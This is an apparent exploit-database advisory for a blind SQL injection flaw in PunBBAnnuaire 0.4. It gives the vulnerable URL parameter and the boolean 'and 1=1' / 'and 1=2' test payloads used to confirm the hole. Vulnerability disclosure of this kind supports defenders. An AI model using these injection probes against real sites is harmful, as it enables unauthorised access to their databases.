PunBBAnnuaire <= 0.4 - Blind SQL Injection Vulnerability



EDB-ID: 11490 CVE: N/A OSVDB-ID: N/A
Author: Metropolis Published: 2010-02-17 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
PunBBAnnuaire <=0.4 Blind SQL Injection Vulnerability
========================================================

####################################################################
.:. Author : Metropolis
.:. Home : http://xrayoptics.by.ru/
.:. Script : PunBBAnnuaire
.:. Version : 0.4
.:. Download Script: http://www.punres.org/download.php?id=1737
.:. Bug Type : Blind Sql Injection

####################################################################

===[ Exploit ]===

/annuaire.php?action=site&id=1[ Blind SQL INJECTION ]


www.site.com/forum/annuaire.php?action=site&id=1 and 1=1 <-- true

www.site.com/forum/annuaire.php?action=site&id=1 and 1=2 <-- false



####################################################################

Vive la France !